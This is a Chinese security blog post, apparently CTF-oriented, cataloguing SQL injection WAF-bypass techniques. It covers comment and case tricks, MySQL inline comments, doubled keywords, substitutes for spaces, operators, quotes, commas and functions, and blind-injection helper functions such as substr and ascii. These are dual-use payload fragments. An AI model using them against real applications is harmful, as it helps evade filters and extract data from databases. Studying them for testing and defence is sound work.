<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>SQL注入绕过技巧 | Mkey的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="SQL注入绕过技巧注释符号绕过1234--		注释内容#		注释内容&#x2F;*注释内容*&#x2F;;  大小写绕过用于waf对大小写不敏感的情况 12uNionSeLect  内联注释绕过内联注释就是把一些特有的仅在MYSQL上的语句放在 &#x2F;*!...*&#x2F; 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。 1&#x2F;*!select*&#x2F;   双写关键字绕过在一些简单的waf中，只替换一次关键字">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入绕过技巧">
<meta property="og:url" content="https://monkeyh0ck.github.io/2021/11/01/sqlInject_raoguo/index.html">
<meta property="og:site_name" content="Mkey的博客">
<meta property="og:description" content="SQL注入绕过技巧注释符号绕过1234--		注释内容#		注释内容&#x2F;*注释内容*&#x2F;;  大小写绕过用于waf对大小写不敏感的情况 12uNionSeLect  内联注释绕过内联注释就是把一些特有的仅在MYSQL上的语句放在 &#x2F;*!...*&#x2F; 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。 1&#x2F;*!select*&#x2F;   双写关键字绕过在一些简单的waf中，只替换一次关键字">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-10-31T16:00:00.000Z">
<meta property="article:modified_time" content="2023-03-26T13:29:11.306Z">
<meta property="article:author" content="HOU">
<meta property="article:tag" content="web-security">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Mkey的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Mkey的博客</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://monkeyh0ck.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sqlInject_raoguo" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/11/01/sqlInject_raoguo/" class="article-date">
  <time class="dt-published" datetime="2021-10-31T16:00:00.000Z" itemprop="datePublished">2021-11-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      SQL注入绕过技巧
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="SQL注入绕过技巧"><a href="#SQL注入绕过技巧" class="headerlink" title="SQL注入绕过技巧"></a>SQL注入绕过技巧</h1><h3 id="注释符号绕过"><a href="#注释符号绕过" class="headerlink" title="注释符号绕过"></a>注释符号绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">--		注释内容</span><br><span class="line">#		注释内容</span><br><span class="line">/*注释内容*/</span><br><span class="line">;</span><br></pre></td></tr></table></figure>

<h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><p>用于waf对大小写不敏感的情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">uNion</span><br><span class="line">SeLect</span><br></pre></td></tr></table></figure>

<h3 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h3><p>内联注释就是把一些特有的仅在MYSQL上的语句放在 <code>/*!...*/</code> 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/*!select*/ </span><br></pre></td></tr></table></figure>

<h3 id="双写关键字绕过"><a href="#双写关键字绕过" class="headerlink" title="双写关键字绕过"></a>双写关键字绕过</h3><p>在一些简单的waf中，只替换一次关键字，则可以通过将两个关键字嵌套来绕过关键字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">selselectect</span><br><span class="line">经过一次替换后为select</span><br></pre></td></tr></table></figure>

<h3 id="特殊编码绕过"><a href="#特殊编码绕过" class="headerlink" title="特殊编码绕过"></a>特殊编码绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">十六进制绕过</span><br><span class="line">ascii编码绕过</span><br></pre></td></tr></table></figure>

<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/**/</span><br><span class="line">()</span><br><span class="line">回车</span><br><span class="line">`</span><br><span class="line">tap</span><br><span class="line">两个空格</span><br></pre></td></tr></table></figure>

<h3 id="过滤or-and-xor-not-绕过"><a href="#过滤or-and-xor-not-绕过" class="headerlink" title="过滤or and xor not 绕过"></a>过滤or and xor not 绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">and = &amp;&amp;</span><br><span class="line">or 	= ||</span><br><span class="line">xor	= |</span><br><span class="line">not = !</span><br></pre></td></tr></table></figure>

<h3 id="过滤-x3D-绕过"><a href="#过滤-x3D-绕过" class="headerlink" title="过滤&#x3D;绕过"></a>过滤&#x3D;绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">like</span><br><span class="line">rlike		模糊匹配</span><br><span class="line">regexp		正则表达式</span><br><span class="line">使用大于小于绕过		如：id&lt;3 and id&gt;1</span><br><span class="line">&lt;&gt;			!=</span><br><span class="line">!(&lt;&gt;)		=</span><br></pre></td></tr></table></figure>

<h3 id="过滤大小于号绕过"><a href="#过滤大小于号绕过" class="headerlink" title="过滤大小于号绕过"></a>过滤大小于号绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">greatest(n1,n2,n3)			返回n中的最大值</span><br><span class="line">least(n1,n2,n3)				返回n中的最小值</span><br><span class="line">strcmp(str1,str2) 			若所有的字符串均相同，则返回STRCMP()，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1</span><br><span class="line">in</span><br><span class="line">between a and b				范围在ab中间</span><br></pre></td></tr></table></figure>

<h3 id="过滤引号绕过"><a href="#过滤引号绕过" class="headerlink" title="过滤引号绕过"></a>过滤引号绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">十六进制</span><br><span class="line">宽字节</span><br></pre></td></tr></table></figure>

<h3 id="过滤逗号绕过"><a href="#过滤逗号绕过" class="headerlink" title="过滤逗号绕过"></a>过滤逗号绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">from pos for len</span><br><span class="line">例如：select substr(&quot;string&quot; from 1 for 3);</span><br><span class="line">等价：select substr(&quot;string&quot;,1,3);</span><br><span class="line"></span><br><span class="line">join</span><br><span class="line">例如：select * from users  union select * from (select 1)a join (select 2)b join(select 3)c;</span><br><span class="line">等价：</span><br><span class="line">union select 1,2,3</span><br><span class="line"></span><br><span class="line">使用like替换substr()中的逗号</span><br><span class="line">select ascii(substr(user(),1,1))=114;</span><br><span class="line">等价：select user() like &quot;r%&quot;;</span><br><span class="line"></span><br><span class="line">offset 过滤limit的逗号</span><br><span class="line">select * from users limit 1 offset 2;</span><br><span class="line">等价：select * from users limit 2,1;</span><br></pre></td></tr></table></figure>

<h3 id="过滤函数绕过"><a href="#过滤函数绕过" class="headerlink" title="过滤函数绕过"></a>过滤函数绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sleep() --&gt; benchmark()</span><br><span class="line">ascii() --&gt; hex()、bin()</span><br><span class="line">group_concat()	--&gt; concat_ws()</span><br><span class="line">substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()</span><br><span class="line">user() --&gt; @@user、datadir–&gt;@@datadir</span><br><span class="line">ord()–&gt;ascii():这两个函数在处理英文时效果一样，但是处理中文等时不一致。</span><br></pre></td></tr></table></figure>







<h3 id="盲注常用函数"><a href="#盲注常用函数" class="headerlink" title="盲注常用函数"></a>盲注常用函数</h3><ul>
<li>substr()<ul>
<li>substr(string, pos, len):从pos开始，取长度为len的子串<br>substr(string, pos):从pos开始，取到string的最后</li>
</ul>
</li>
<li>substring()<ul>
<li>用法和substr()一样</li>
</ul>
</li>
<li>mid()<ul>
<li>用法和substr()一样，但是mid()是为了向下兼容VB6.0，已经过时，以上的几个函数的pos都是从1开始的</li>
</ul>
</li>
<li>left()和right()<ul>
<li>left(string, len)和right(string, len):分别是从左或从右取string中长度为len的子串</li>
</ul>
</li>
<li>limit<ul>
<li>limit pos len:在返回项中从pos开始去len个返回值，pos的从0开始</li>
</ul>
</li>
<li>ascii()和char()<ul>
<li>ascii(char):把char这个字符转为ascii码</li>
<li>char(ascii_int):和ascii()的作用相反，将ascii码转字符</li>
</ul>
</li>
</ul>
<blockquote>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/huanghelouzi/article/details/82995313">sql注入绕过方法总结_韦全敏的博客-CSDN博客_sql绕过</a></p>
</blockquote>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://monkeyh0ck.github.io/2021/11/01/sqlInject_raoguo/" data-id="cljuunh6k000wg8v57e44evb5" data-title="SQL注入绕过技巧" class="article-share-link">分享</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web-security/" rel="tag">web-security</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/11/01/fileupload/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">前一篇</strong>
      <div class="article-nav-title">
        
          文件上传漏洞
        
      </div>
    </a>
  
  
    <a href="/2021/11/01/sqlilabs/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">sqlilabs</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web-security/" rel="tag">web-security</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/ctf/" style="font-size: 10px;">ctf</a> <a href="/tags/web-security/" style="font-size: 20px;">web-security</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">六月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">三月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">二月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">一月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">十二月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">十一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/07/09/BUUCTF-web-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-EasySQL/">BUUCTF-web-[极客大挑战 2019]EasySQL</a>
          </li>
        
          <li>
            <a href="/2022/06/01/%E5%8F%8D%E5%BC%B9shell/">反弹shell</a>
          </li>
        
          <li>
            <a href="/2022/06/01/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/">逻辑漏洞</a>
          </li>
        
          <li>
            <a href="/2022/03/01/Log4j/">Log4j</a>
          </li>
        
          <li>
            <a href="/2022/03/01/OWASP/">OWASP TOP 10</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 HOU<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>